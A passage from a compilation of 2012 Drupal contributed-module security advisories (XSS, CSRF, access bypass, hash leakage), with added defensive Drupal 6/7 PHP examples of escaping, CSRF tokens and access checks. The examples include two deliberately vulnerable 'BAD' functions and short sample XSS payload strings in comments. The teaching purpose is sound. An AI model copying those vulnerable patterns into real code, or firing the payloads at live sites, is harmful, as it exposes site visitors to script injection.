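  // attribute; never concatenate $node->title into HTML raw.
  return l($node->title, 'node/' . $node->nid,
    array('attributes' => array('title' => $node->title)));
}

/**
 * Block content: table of contents for the node being viewed.
 *
 * Blocks are still rendered on the access-denied page that replaces a
 * restricted node, and arg(1) still names that node, so the block cannot
 * rely on the page callback's access check; it must ask node_access()
 * itself before looking at the body.
 */
function example_toc_block_content() {
  if (arg(0) != 'node' || !is_numeric(arg(1))) {
    return '';
  }
  $node = node_load((int) arg(1));
  if (!$node || !node_access('view', $node) || empty($node->body)) {
    return '';
  }
  // Run the node's own input format ($check = FALSE: the viewer need not
  // hold the format permission to see content rendered with it).
  $body = check_markup($node->body, $node->format, FALSE);

  $items = array();
  if (preg_match_all('!<h([1-6])[^>]*>(.*?)</h\1>!is', $body, $matches, PREG_SET_ORDER)) {
    foreach ($matches as $m) {
      // Heading text came out of the filter system, but it is re-escaped
      // here because it is being placed into new markup.
      $items[] = check_plain(trim(strip_tags($m[2])));
    }
  }
  return $items ? theme('item_list', $items) : '';
}
```

The general rule both functions follow: any code path that displays data derived from a node, however small the fragment, performs its own node_access('view') check rather than assuming some earlier layer already did.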
[Full-disclosure] [Security-news] SA-CONTRIB-2012-165 - Chaos tool suite (ctools) - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1840992

* Advisory ID: DRUPAL-SA-CONTRIB-2012-165
* Project: Chaos tool suite (ctools) [1] (third-party module)
* Version: 6.x
* Date: 2012-November-14
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

The Chaos tool suite is primarily a set of APIs and tools to improve the developer experience.

The page manager node view task does not sufficiently escape node titles when setting the page title, allowing XSS.

This vulnerability is partially mitigated by the node task being disabled by default and limited to users that have the ability to submit or edit nodes.

CVE: Requested

VERSIONS AFFECTED

* Chaos tool suite (ctools) 6.x-1.x versions prior to 6.x-1.10.

Drupal core is not affected. If you do not use the contributed Chaos tool suite (ctools) [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Chaos tool suite (ctools) module for Drupal 6.x, upgrade to Chaos tool suite (ctools) 6.x-1.10 [4]

Also see the Chaos tool suite (ctools) [5] project page.

REPORTED BY

* Justin KleinKeane [6]
* Andrey Tretyakov [7]

FIXED BY

* Earl Miles (merlinofchaos) [8]

COORDINATED BY

* Klaus Purer [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/ctools
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/ctools
[4] http://drupal.org/node/1841030
[5] http://drupal.org/project/ctools
[6] http://drupal.org/user/302225
[7] http://drupal.org/user/169459
[8] http://drupal.org/user/26979
[9] http://drupal.org/user/262198
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-164 - Smiley module and Smileys module - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1840892

* Advisory ID: DRUPAL-SA-CONTRIB-2012-164
* Project: Smiley [1] (third-party module)
* Project: Smileys [2] (third-party module)
* Version: 6.x
* Date: 2012-November-14
* Security risk: Moderately critical [3]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

These modules enable you to substitute text emoticons, like :-), with images.

These modules don't sufficiently sanitize user-defined smiley acronyms before displaying smiley images.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer smiley".

These two modules are based on the same codebase; Smiley was forked due to lack of new feature development in the Smileys project. This single security advisory covers the same issue in the code of both modules.

CVE: Requested

VERSIONS AFFECTED

* Smiley 6.x-1.x versions prior to 6.x-1.1.
* Smileys 6.x-1.x versions prior to 6.x-1.1.

Drupal core is not affected. If you do not use the contributed Smiley [4] module or the Smileys [5] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Smiley module for Drupal 6.x, upgrade to Smiley 6.x-1.1 [6]
* If you use the Smileys module for Drupal 6.x, upgrade to Smileys 6.x-1.1 [7]

Also see the Smiley [8] project page.

REPORTED BY

* Jimmy Axenhus [9]

FIXED BY

* Yonas Yanfa [10], the module maintainer

COORDINATED BY

* Michael Hess [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/smiley
[2] http://drupal.org/project/smileys
[3] http://drupal.org/security-team/risk-levels
[4] http://drupal.org/project/smiley
[5] http://drupal.org/project/smileys
[6] http://drupal.org/node/1840956
[7] http://drupal.org/node/1840954
[8] http://drupal.org/project/smiley
[9] http://drupal.org/user/565562
[10] http://drupal.org/user/473174
[11] http://drupal.org/user/102818
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
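Five of the advisories above (Zero Point, Email Field, Mixpanel, Chaos tool suite, Smiley) are the same defect in different output contexts: a string reaches an HTML attribute, a URL, inline JavaScript or the page title without the escaping that particular context needs. The following added example, written for this page and not code from any of those projects, pairs each context with the Drupal 6 API that handles it. It assumes a Drupal 6 bootstrap; the function and variable names are this example's own.

```php
<?php
// Added example, not code from any of the modules or themes above. Assumes a
// Drupal 6 bootstrap; check_plain(), check_url(), drupal_to_js(), l(), theme(),
// base_path(), drupal_add_js() and drupal_set_title() are core D6 functions.
// Function and variable names are this example's own.

// 1. A path alias or request path placed in an href (cf. Zero Point).
//    BAD: $_GET['q'] and aliases are attacker-influenced strings; a request
//    for /node/1"><script>... closes the attribute and the tag.
function example_canonical_link_bad($alias) {
  return '<link rel="canonical" href="/' . $alias . '" />';
}
//    GOOD: check_url() strips dangerous protocols (javascript:, data:, ...)
//    and HTML-escapes the remainder, so quotes and angle brackets are inert.
function example_canonical_link($alias) {
  return '<link rel="canonical" href="' . check_url(base_path() . $alias) . '" />';
}

// 2. A stored e-mail address rendered as a mailto: link (cf. Email Field).
//    valid_email_address() at form time is a second line of defence, not a
//    substitute: rows imported around the form never passed validation.
//    l() runs the href through check_url() and the text through check_plain().
function example_mailto($mail, $display = NULL) {
  $text = isset($display) ? $display : $mail;
  return l($text, 'mailto:' . $mail);
}

// 3. A configuration value embedded in inline JavaScript (cf. Mixpanel).
//    BAD: a token of  ");alert(1);//  terminates the string literal and
//    the call; </script> inside it terminates the whole script element.
function example_tracking_js_bad($token) {
  drupal_add_js('mixpanel.init("' . $token . '");', 'inline');
}
//    GOOD: drupal_to_js() emits a quoted JS literal with quotes, backslashes
//    and < > & escaped (\x3c etc.), so the value cannot leave the string.
function example_tracking_js($token) {
  drupal_add_js('mixpanel.init(' . drupal_to_js($token) . ');', 'inline');
}

// 4. A node title used as the page title (cf. ctools page manager).
//    D6 drupal_set_title() stores the string as given and page.tpl.php
//    prints it unescaped, so the caller must escape. (Drupal 7's
//    drupal_set_title() applies check_plain() by default.)
function example_set_node_title($node) {
  drupal_set_title(check_plain($node->title));
}

// 5. Admin-defined smiley acronyms shown as image alt/title text (cf. Smiley).
//    theme('image') escapes the path with check_url() and alt/title with
//    check_plain(); "administer smiley" must not become "inject HTML".
//    $getsize is FALSE so no filesystem lookup is needed for the example.
function example_smiley_img($path, $acronym) {
  return theme('image', $path, $acronym, $acronym, NULL, FALSE);
}
```

The mitigation language in several of these advisories ("must have the permission X") is worth reading alongside the code: a permission that lets a role change configuration is not a permission to run script in every other visitor's browser, which is why stored values are escaped on output regardless of who stored them.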
[Full-disclosure] [Security-news] SA-CONTRIB-2012-162 - RESTful Web Services - Cross site request forgery (CSRF)
View online: http://drupal.org/node/1840740

* Advisory ID: DRUPAL-SA-CONTRIB-2012-162
* Project: RESTful Web Services [1] (third-party module)
* Version: 7.x
* Date: 2012-November-14
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Request Forgery

DESCRIPTION

This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF.

The module doesn't sufficiently verify POST requests, thereby exposing a cross site request forgery vulnerability.

This vulnerability is mitigated by the fact that an attacker must trick an authenticated user onto a page with a site-specific malicious HTML form submission.

CVE: Requested

VERSIONS AFFECTED

* RESTWS 7.x-1.x versions prior to 7.x-1.1.
* RESTWS 7.x-2.x versions prior to 7.x-2.0-alpha3.

Drupal core is not affected. If you do not use the contributed RESTful Web Services [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.1 [4]
* If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.0-alpha3 [5]

Also see the RESTful Web Services [6] project page.

REPORTED BY

* Damien Tournoud [7] of the Drupal Security Team
* Klaus Purer [8] of the Drupal Security Team

FIXED BY

* Klaus Purer [9], the module maintainer

COORDINATED BY

* Klaus Purer [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/restws
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/restws
[4] http://drupal.org/node/1840722
[5] http://drupal.org/node/1840728
[6] http://drupal.org/project/restws
[7] http://drupal.org/user/22211
[8] http://drupal.org/user/262198
[9] http://drupal.org/user/262198
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
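For the RESTful Web Services advisory above, the following added example (written for this page; it is not the module's own fix, whose details the advisory does not give) shows the standard Drupal 7 defence for a cookie-authenticated JSON API: a per-session token that only same-origin JavaScript can fetch, required in a custom request header on every state-changing method. It assumes a Drupal 7 bootstrap; the header name X-CSRF-Token, the token seed 'example_api' and the callback names are this example's choices.

```php
<?php
// Added example, not the RESTful Web Services module's code. Assumes a Drupal 7
// bootstrap; drupal_get_token(), drupal_valid_token(), user_is_anonymous(),
// drupal_add_http_header() and drupal_exit() are core. The header name, the
// seed value and the function names are this example's choices.

define('EXAMPLE_API_TOKEN_SEED', 'example_api');

/**
 * Menu callback, e.g. at example/token: hand the current session's token to
 * a JavaScript client. drupal_get_token() is an HMAC over the seed keyed
 * with the session id and the site's private key, so the value is useless
 * from any other session. Only an XHR from the site's own origin can read
 * this response body; a <form> or <img> on an attacker's page cannot.
 */
function example_api_token_page() {
  drupal_add_http_header('Content-Type', 'text/plain');
  print drupal_get_token(EXAMPLE_API_TOKEN_SEED);
  drupal_exit();
}

/**
 * Gate every state-changing request.
 *
 * The forged form the advisory describes makes the victim's browser send
 * the session cookie, but a cross-origin form submission cannot add a
 * custom header and cannot read the token, so the check fails for CSRF
 * while the site's own client, which fetched the token first, passes.
 */
function example_api_check_csrf() {
  $method = strtoupper($_SERVER['REQUEST_METHOD']);
  // Safe methods must not change state and therefore need no token.
  if (in_array($method, array('GET', 'HEAD', 'OPTIONS'))) {
    return TRUE;
  }
  // Anonymous requests carry no ambient credential to forge.
  if (user_is_anonymous()) {
    return TRUE;
  }
  $token = isset($_SERVER['HTTP_X_CSRF_TOKEN']) ? $_SERVER['HTTP_X_CSRF_TOKEN'] : '';
  return $token !== '' && drupal_valid_token($token, EXAMPLE_API_TOKEN_SEED);
}

/**
 * A resource handler using the gate. The client side is two same-origin
 * requests: GET example/token, then the real call with the token copied
 * into the X-CSRF-Token header.
 */
function example_api_node_update($nid, array $data) {
  if (!example_api_check_csrf()) {
    drupal_add_http_header('Status', '403 Forbidden');
    return array('error' => 'Missing or invalid X-CSRF-Token header');
  }
  $node = node_load($nid);
  if (!$node || !node_access('update', $node)) {
    drupal_add_http_header('Status', '403 Forbidden');
    return array('error' => 'Access denied');
  }
  if (isset($data['title'])) {
    $node->title = $data['title'];
  }
  node_save($node);
  return array('nid' => (int) $node->nid);
}
```

Two caveats a reviewer would raise: the token only protects sessions that authenticate by cookie, so an API that also accepts per-request credentials (HTTP Basic, OAuth) should apply the gate only to cookie-authenticated callers; and the token check is in addition to, not instead of, the node_access() check, because CSRF protection says nothing about whether the victim was allowed to do the action in the first place.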
[Full-disclosure] [Security-news] SA-CONTRIB-2012-163 - User Read-Only - Permission escalation
View online: http://drupal.org/node/1840886

* Advisory ID: DRUPAL-SA-CONTRIB-2012-163
* Project: User Read-Only [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-November-14
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION

User Read-Only is a module that allows an administrator to prevent modification of user account/profile fields. The administrator can select which fields will allow or disallow editing.

The module can mistakenly assign roles when performing unrelated operations against a user's account, such as changing a password. The vulnerability is particular to certain combinations of configuration and the number of roles available on the site (more than 3).

CVE: Requested

VERSIONS AFFECTED

* User Read-Only 6.x-1.x versions prior to 6.x-1.4.
* User Read-Only 7.x-1.x versions prior to 7.x-1.4.

Drupal core is not affected. If you do not use the contributed User Read-Only [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the User Read-Only module for Drupal 6.x, upgrade to User Read-Only 6.x-1.4 [4]
* If you use the User Read-Only module for Drupal 7.x, upgrade to User Read-Only 7.x-1.4 [5]

Also see the User Read-Only [6] project page.

REPORTED BY

* Kellie Bradford Delaney [7]

FIXED BY

* David Norman [8], the module maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team
* Heine Deelstra [10] of the Drupal Security Team
* Lee Rowlands [11], provisional member of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/user_readonly
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/user_readonly
[4] http://drupal.org/node/1840054
[5] http://drupal.org/node/1840038
[6] http://drupal.org/project/user_readonly
[7] http://drupal.org/user/1473110
[8] http://drupal.org/user/972
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/17943
[11] http://drupal.org/user/395439
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-160 - OM Maximenu - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1834866

* Advisory ID: DRUPAL-SA-CONTRIB-2012-160
* Project: OM Maximenu [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-November-07
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

This module enables you to create custom menus with effects and integrate module blocks as its menu item content.

The module doesn't sufficiently state the risk of giving permission to create OM Maximenus.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer OM Maximenu".

CVE: Requested

VERSIONS AFFECTED

* OM Maximenu 6.x-1.x versions prior to 6.x-1.44.
* OM Maximenu 7.x-1.x versions prior to 7.x-1.44.

Drupal core is not affected. If you do not use the contributed OM Maximenu [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the OM Maximenu module for Drupal 6.x, upgrade to OM Maximenu 6.x-1.44 [4]
* If you use the OM Maximenu module for Drupal 7.x, upgrade to OM Maximenu 7.x-1.44 [5]

Also see the OM Maximenu [6] project page.

REPORTED BY

* Justin KleinKeane [7]

FIXED BY

* Daniel Honrade [8], the module maintainer
* Károly Négyesi [9] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/om_maximenu
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/om_maximenu
[4] http://drupal.org/node/1834046
[5] http://drupal.org/node/1834048
[6] http://drupal.org/project/om_maximenu
[7] http://drupal.org/user/302225
[8] http://drupal.org/user/351112
[9] http://drupal.org/user/9446
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-161 - Webform CiviCRM Integration - Access Bypass
View online: http://drupal.org/node/1834868

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-161
  * Project: Webform CiviCRM Integration [1] (third-party module)
  * Version: 7.x
  * Date: 2012-November-07
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Access bypass

DESCRIPTION
-----------
Webform CiviCRM integration allows you to expose contact data via Webforms. Depending on what fields you have exposed in your form, this may include personal information such as birthdate, phone number, email address, etc. Proper permission settings are important to keep this information from prying eyes.

Each "existing contact" on a webform has a setting to enforce CiviCRM permissions -- this setting should rarely be disabled, and only done so by admins who know what they're doing. Unfortunately some circumstances may have led this setting to be incorrectly disabled by the admin:
  * In versions 3.0 - 3.1 of this module, "Enforce Permissions" was not on by default, and needed to be manually selected by the admin. This was fixed in 3.2.
  * In versions 3.0 - 3.2, the current user could not be autofilled for normal unprivileged users. This may have led some admins to disable the "Enforce Permissions" setting, a dangerous workaround.
  * In versions 3.0 - 3.3, autofilling a contact via the url with a checksum did not work for anonymous users unless the "Enforce Permissions" setting was disabled.

Version 3.4 includes an update script which will automatically set "Enforce Permissions" for all existing contacts to /true/. Once you have upgraded, you may wish to review your webforms and ensure that autofilling contacts works as expected, especially for anonymous users. In a few rare cases where you have established access control through some other means, disabling "Enforce Permissions" may be necessary and you will need to do so manually.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Webform CiviCRM Integration 7.x-3.0 to 7.x-3.3

Drupal core is not affected. If you do not use the contributed Webform CiviCRM Integration [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use Webform CiviCRM Integration version 3.x, upgrade to version 3.4 [4]

Also see the Webform CiviCRM Integration [5] project page.

REPORTED BY
-----------
  * Coleman Watts [6] the module maintainer

FIXED BY
--------
  * Coleman Watts [7] the module maintainer

COORDINATED BY
--------------
  * Greg Knaddison [8] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/webform_civicrm
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/webform_civicrm
[4] http://drupal.org/node/1833974
[5] http://drupal.org/project/webform_civicrm
[6] http://drupal.org/user/639856
[7] http://drupal.org/user/639856
[8] http://drupal.org/user/36762
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-159 - Password policy - Information leakage of hashed passwords
View online: https://drupal.org/node/1828340

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-159
  * Project: Password policy [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2012-October-31
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Information Disclosure

DESCRIPTION
-----------
This module provides a way to specify a certain level of password complexity (a.k.a. "password hardening") for user passwords on a system by defining a password policy.

The Password policy module allows administrators to request users to enter a new password that does not match any of the previous X passwords they have used (X is determined by the site configuration). If this feature is enabled, a malicious user with the capability to view another user's HTTP traffic can discover the hashed version of their password. This issue is more of a risk for Drupal 6 sites that use the default md5 password hashing.

This issue only affects sites that use the module's "previous passwords" feature, and fail to encrypt their users' HTTP transactions with SSL/TLS.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * Password policy 6.x-1.x versions prior to 6.x-1.5.
  * Password policy 7.x-1.x versions prior to 7.x-1.3.

Drupal core is not affected. If you do not use the contributed Password policy [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the Password policy module for Drupal 6.x, upgrade to Password policy 6.x-1.5 [4]
  * If you use the Password policy module for Drupal 7.x, upgrade to Password policy 7.x-1.3 [5]

Also see the Password policy [6] project page.

REPORTED BY
-----------
  * Alexis Wilke [7]

FIXED BY
--------
  * Mark Shropshire [8]

COORDINATED BY
--------------
  * Greg Knaddison [9] of the Drupal Security Team
  * Michael Hess [10] of the Drupal Security Team
  * Damien Tournoud [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/password_policy
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/password_policy
[4] https://drupal.org/node/1828130
[5] https://drupal.org/node/1828142
[6] http://drupal.org/project/password_policy
[7] http://drupal.org/user/356197
[8] http://drupal.org/user/14767
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/102818
[11] http://drupal.org/user/22211
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
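The defensive pattern behind this advisory, as an added example that is not the Password policy module's code: previous-password hashes stay in the database and a candidate password is compared against them on the server during form validation, so no hash is ever placed in the markup sent to the browser. The module name example_pw, its history table {example_pw_history} (columns uid, pass, created) and the variable example_pw_history_count are assumptions; user_check_password(), the database API, DRUPAL_ROOT and the user_profile_form alter hook are Drupal 7 core.

```php
<?php
// Added example, not the Password policy module's code. Hypothetical module
// "example_pw" with its own table {example_pw_history}(uid, pass, created).

/**
 * Stores the account's current hash so a later change can be checked against it.
 * Intended to be called from hook_user_insert()/hook_user_update() when the
 * password has just been (re)set.
 */
function example_pw_history_record($account) {
  db_insert('example_pw_history')
    ->fields(array(
      'uid' => $account->uid,
      'pass' => $account->pass,
      'created' => REQUEST_TIME,
    ))
    ->execute();
}

/**
 * Returns TRUE when $candidate equals one of the user's last $count passwords.
 *
 * user_check_password() re-runs whichever algorithm produced the stored hash
 * (phpass, or md5 for "U$" hashes migrated from Drupal 6) on the server, so the
 * hashes never leave the database.
 */
function example_pw_history_reused($uid, $candidate, $count) {
  require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');
  $hashes = db_select('example_pw_history', 'h')
    ->fields('h', array('pass'))
    ->condition('uid', $uid)
    ->orderBy('created', 'DESC')
    ->range(0, $count)
    ->execute()
    ->fetchCol();
  foreach ($hashes as $hash) {
    // user_check_password() only reads the ->pass property of the account.
    if (user_check_password($candidate, (object) array('pass' => $hash))) {
      return TRUE;
    }
  }
  return FALSE;
}

/**
 * Implements hook_form_FORM_ID_alter() for user_profile_form().
 */
function example_pw_form_user_profile_form_alter(&$form, &$form_state) {
  $form['#validate'][] = 'example_pw_history_validate';
}

/**
 * Validation handler: runs entirely server-side on the POST; the form that was
 * sent to the browser carried no hashes for the client to compare against.
 */
function example_pw_history_validate($form, &$form_state) {
  $candidate = isset($form_state['values']['pass']) ? $form_state['values']['pass'] : '';
  $count = variable_get('example_pw_history_count', 5);  // hypothetical variable
  if ($candidate !== '' && example_pw_history_reused($form['#user']->uid, $candidate, $count)) {
    form_set_error('pass', t('That password was used recently; please choose a different one.'));
  }
}
```

Even with the comparison server-side, the advisory's second condition still applies: the candidate password itself crosses the network in the POST, which is why the site should serve the account forms over TLS.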
[Full-disclosure] [Security-news] SA-CONTRIB-2012-158 - MailChimp - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1822166

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-158
  * Project: MailChimp [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-24
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION
-----------
This module provides integration with the MailChimp email delivery service.

There are two issues with the webhook processing, which is exposed as an API in mailchimp.module and used by mailchimp_lists.module to update subscriber information.
  * The webhook URL key can be trivially calculated.
  * Webhook variables from POST requests are not properly sanitized.

Mitigating these issues is the fact that attackers cannot tamper with email subscriptions even if they know the webhook path, because changes are pulled in from the MailChimp API only.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * MailChimp 7.x-2.x versions prior to 7.x-2.7.

Drupal core is not affected. If you do not use the contributed MailChimp [3] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:
  * If you use the MailChimp module for Drupal 7.x, upgrade to MailChimp 7.x-2.7 [4]

Also see the MailChimp [5] project page.

REPORTED BY
-----------
  * Dmitriy Trt [6] (Dmitriy.trt)

FIXED BY
--------
  * Lev Tsypin [7] (levelos) the module maintainer

COORDINATED BY
--------------
  * Klaus Purer [8] (klausi) of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing secure code for Drupal [11], and securing your site [12].

[1] http://drupal.org/project/mailchimp
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mailchimp
[4] http://drupal.org/node/1821330
[5] http://drupal.org/project/mailchimp
[6] http://drupal.org/user/329125
[7] http://drupal.org/user/54135
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration
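An added example, not the MailChimp module's code, of the two properties the advisory's bullet points call for in a webhook endpoint: a path key generated from Drupal 7's CSPRNG wrapper rather than computed from values an outsider can reconstruct, and webhook POST fields that are read from an allow-list, validated, and only ever emitted through escaping placeholders. The module name example_hook, the variable example_hook_key, the path example-hook/webhook/% and the list of event types are assumptions; drupal_random_bytes(), drupal_hash_base64(), valid_email_address(), watchdog(), drupal_json_output() and the MENU_* constants are core APIs.

```php
<?php
// Added example, not the MailChimp module's code. Hypothetical module
// "example_hook" that receives provider webhooks at example-hook/webhook/KEY.

/**
 * Returns the secret path segment, generating and storing it on first use.
 *
 * The key is 32 bytes from the CSPRNG, base64-hashed so it is URL-safe. It is
 * not derived from the site name, a list ID or any other value someone outside
 * the site could recompute.
 */
function example_hook_key() {
  $key = variable_get('example_hook_key', '');  // hypothetical variable
  if ($key === '') {
    $key = drupal_hash_base64(drupal_random_bytes(32));
    variable_set('example_hook_key', $key);
  }
  return $key;
}

/**
 * Compares a candidate with the stored key without stopping at the first
 * differing byte (hash_equals() is not available on 2012-era PHP).
 */
function example_hook_key_matches($candidate) {
  $expected = example_hook_key();
  if (!is_string($candidate) || strlen($candidate) !== strlen($expected)) {
    return FALSE;
  }
  $diff = 0;
  for ($i = 0, $n = strlen($expected); $i < $n; $i++) {
    $diff |= ord($candidate[$i]) ^ ord($expected[$i]);
  }
  return $diff === 0;
}

/**
 * Implements hook_menu().
 */
function example_hook_menu() {
  $items = array();
  $items['example-hook/webhook/%'] = array(
    'page callback' => 'example_hook_receive',
    'page arguments' => array(2),
    // Unauthenticated by design: the key in the path is the credential.
    'access callback' => TRUE,
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Page callback for the webhook.
 *
 * Only two POST fields are read, both are validated against a fixed shape, and
 * neither is echoed: watchdog() %placeholders pass through check_plain() and
 * the JSON reply contains no request data.
 */
function example_hook_receive($key) {
  if (!example_hook_key_matches($key)) {
    return MENU_ACCESS_DENIED;
  }
  $type = (isset($_POST['type']) && is_string($_POST['type'])) ? $_POST['type'] : '';
  $email = (isset($_POST['data']['email']) && is_string($_POST['data']['email'])) ? $_POST['data']['email'] : '';
  $allowed_types = array('subscribe', 'unsubscribe', 'profile', 'cleaned');  // constructed allow-list
  if (!in_array($type, $allowed_types, TRUE) || !valid_email_address($email)) {
    return MENU_NOT_FOUND;
  }
  watchdog('example_hook', 'Webhook %type received for %email.', array('%type' => $type, '%email' => $email), WATCHDOG_INFO);
  // The body is treated as a notification only. Any change to local subscriber
  // records would be made from a fresh read of the provider's API here, which
  // is the property the advisory names as mitigating the issue.
  drupal_json_output(array('status' => 'ok'));
  drupal_exit();
}
```

If the event type or address ever has to appear in page output rather than a log entry, wrap it in check_plain() at that point; escaping on output, not on input, is the Drupal convention the advisory's second bullet refers to.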
[Full-disclosure] [Security-news] SA-CONTRIB-2012-157 - Time Spent - Multiple Vulnerabilities - (unsupported)
View online: https://drupal.org/node/1822066

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-157
  * Project: Time Spent [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2012-October-24
  * Security risk: Critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting, Cross Site Request Forgery, SQL Injection, Multiple vulnerabilities

DESCRIPTION
-----------
The Time Spent module tracks the time a registered user spends on a site and a site's content.

The module doesn't sufficiently sanitize user input. Cross site scripting, cross-site request forgery, and SQL injection vulnerabilities have all been found.

CVE: Requested

VERSIONS AFFECTED
-----------------
  * All Time Spent module versions.

Drupal core is not affected. If you do not use the contributed Time Spent [3] module, there is nothing you need to do.

SOLUTION
--------
Uninstall the module:
  * If you use the Time Spent module you should disable the module.

Also see the Time Spent [4] project page.

REPORTED BY
-----------
  * Dylan Riordan [5] (amorsent)
  * Greg Knaddison [6] (greggles) of the Drupal Security Team

COORDINATED BY
--------------
  * Forest Monsen [7] (forestmonster) of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11].

[1] http://drupal.org/project/time_spent
